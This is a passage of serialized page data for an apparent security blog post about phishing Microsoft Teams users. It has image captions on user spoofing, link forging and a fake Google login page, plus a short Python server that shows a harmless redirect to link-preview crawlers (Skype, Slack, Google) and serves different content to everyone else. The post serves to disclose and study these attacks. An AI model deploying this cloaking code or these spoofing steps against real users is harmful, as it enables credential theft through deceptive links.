user",{"url":42060,"width":42061,"height":42062},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002FEa6mrq6bzXvD3RcD63kWR\u002Fa2bdd1fe10a412d5bb4a50792900958a\u002FRendering_of_the_attacker_chosen_name.png",584,147,{"sys":42064,"__typename":1765,"title":42065,"caption":42065,"layoutMode":59,"file":42066},{"id":41656},"Teams invite from a user from an external Teams organization - note email shows",{"url":42067,"width":42068,"height":42069},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002FvM7Bwt93lImxESrXbILv7\u002F6dfe4d01f9025e5eea207b8905e01d1b\u002FTeams_invite_from_a_user_from_an_external_Teams_organization.png",804,718,{"sys":42071,"__typename":1765,"title":42072,"caption":42072,"layoutMode":59,"file":42073},{"id":41750},"Link forging shows the real domain on a hover-over, but is otherwise permitted",{"url":42074,"width":1770,"height":42075},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F6ggeHuKDrHgIpQetUprgHq\u002F5e89fe2a3340810730411617fca737f6\u002FLink_forging_shows_the_real_domain_on_a_hover-over.png",134,{"sys":42077,"__typename":1765,"title":42078,"caption":42078,"layoutMode":59,"file":42079},{"id":41763},"A hover-over still shows the true URL with a friendly text link",{"url":42080,"width":1770,"height":42075},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F3mCc91OKYETyhLSOFiTd3W\u002Fbec7b7cc4bdbcd5d7bb31e6917916f38\u002FA_hover_over_friendly_text_link.png",{"sys":42082,"__typename":1765,"title":42083,"caption":42083,"layoutMode":59,"file":42084},{"id":41783},"Link unfurling resulting in a helpful link preview ",{"url":42085,"width":42086,"height":42087},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002FCG1C7iH9rbdOma5CqoE0D\u002F347d201afe66a89e1494f75f5bb20be8\u002Funfurling.png",554,183,{"sys":42089,"__typename":42090,"name":42091,"type":42092,"syntax":42093},{"id":41818},"CodeBlockComponent","Blog > Code > Phishing Microsoft Teams for initial access #1","markup","User-Agent Mozilla\u002F5.0 (Windows NT 6.1; WOW64) SkypeUriPreview Preview\u002F0.5 skype-url-preview@microsoft.com",{"sys":42095,"__typename":42090,"name":42096,"type":42097,"syntax":42098},{"id":41831},"Blog > Code > Phishing Microsoft Teams for initial access #2","python","from http.server import HTTPServer, SimpleHTTPRequestHandler\n\n\nclass MyHandler(SimpleHTTPRequestHandler):\n    def do_GET(self):\n        for header, val in self.headers.items():\n            if header == \"User-Agent\":\n                print(header, val)\n                if val.startswith(\"Slackbot-LinkExpanding\") or \"SkypeUriPreview\" in val or \"Google-PageRenderer\" in val:\n                    self.send_response(301)\n                    self.send_header('Location', 'https:\u002F\u002Fdocs.google.com\u002Fpresentation\u002Fd\u002F1JsjD2Ro9KaHmW2vILPKJ6-7ptW89pfsAReyzCxQdpq0\u002Fedit?usp=sharing')\n                    self.end_headers()\n                    return\n            print(header, val)\n        return super(MyHandler, self).do_GET()\n\n\nhttpd = HTTPServer(('localhost', 8000), MyHandler)\nhttpd.serve_forever()\n",{"sys":42100,"__typename":1765,"title":42101,"caption":42101,"layoutMode":59,"file":42102},{"id":41872},"Phishing message making use of user spoofing and link preview spoofing to make the link seem legitimate",{"url":42103,"width":42104,"height":42105},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F2HZqHpcwUFOaOSaeUbk1rx\u002F119597868eaee6982e3f5510e2ed8caa\u002FPhishing_message.png",857,205,{"sys":42107,"__typename":1765,"title":42108,"caption":42108,"layoutMode":59,"file":42109},{"id":41878},"The fake Google phishing page the user is directed to when clicking the link, in this case hosted on a custom ngrok domain",{"url":42110,"width":42111,"height":42112},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F5dueTUJMn1lFQa7mwIVFca\u002F4bf1fd95291ea188bd740faadf2f4411\u002Ffake_Google_phishing_page.png",1718,1560,{"sys":42114,"__typename":1765,"title":42115,"caption":59,"layoutMode":59,"file":42116},{"id":41898},"How this attack works from a data flow perspective",{"url":42117,"width":42118,"height":42119},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F1oFP5nagW2OSROK6ckicc6\u002F3af9c8d6662b3db9aac0769e353414df\u002FUpdated-Teams.png",2560,1440,{"sys":42121,"__typename":1765,"title":42122,"caption":42122,"layoutMode":59,"file":42123},{"id":41932},"An edited message to remove the malicious link and replace it with the same link used for spoofed link preview.",{"url":42124,"width":42104,"height":42105},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F1a5WPjras9dNqxiw3Yrz8m\u002F8ef6fa561ae343916eb9d5bf576dcb77\u002FPhishing_message_edited.png",{"sys":42126,"__typename":13297,"type":42127,"ctaText":42128,"buttonLabel":42129,"buttonColour":42130,"buttonUrl":59},{"id":42022},"LinkedIn","See more original research and technical content from Push","Follow us on LinkedIn","orange",{"items":42132},[],{},"How attackers go phishing on Microsoft Teams","2024-01-23T00:00:00.000Z",{"items":42137},[],"phishing-microsoft-teams-for-initial-access","blog\u002Fphishing-microsoft-teams-for-initial-access",{"json":42141},{"data":42142,"content":42143,"nodeType":875},{},[42144],{"data":42145,"content":42146,"nodeType":879},{},[42147],{"data":42148,"marks":42149,"value":42150,"nodeType":883},{},[],"In this article, we will highlight a number of spoofing and phishing strategies that can be employed by external attackers to target an organization using Teams in the initial access phase of the kill chain.","In this article, we will cover a number of spoofing and phishing strategies that can be employed by external attackers to target an organization using Teams.\n",{"id":42153,"publishedAt":42154},"2cv7Yq1DQpm1Mho7fKDs44","2026-08-12T11:55:39.663Z",{"items":42156},[42157,42159],{"sys":42158,"name":3273},{"id":3272},{"sys":42160,"name":298},{"id":6696},{"items":42162},[42163,42165,42167,42169,42171,42173,42175,42177,42179],{"sys":42164,"name":280,"slug":281,"tier":31},{"id":277},{"sys":42166,"name":521,"slug":522,"tier":31},{"id":518},{"sys":42168,"name":415,"slug":416,"tier":31},{"id":412},{"sys":42170,"name":298,"slug":299,"tier":31},{"id":295},{"sys":42172,"name":607,"slug":608,"tier":45},{"id":604},{"sys":42174,"name":325,"slug":326,"tier":45},{"id":322},{"sys":42176,"name":477,"slug":478,"tier":45},{"id":474},{"sys":42178,"name":450,"slug":451,"tier":45},{"id":447},{"sys":42180,"name":433,"slug":434,"tier":45},{"id":430},"mSeA7VddPhh37XtDnGnrKx4mAaDuD5Xh2TBH5LYCKq0",1789500343091]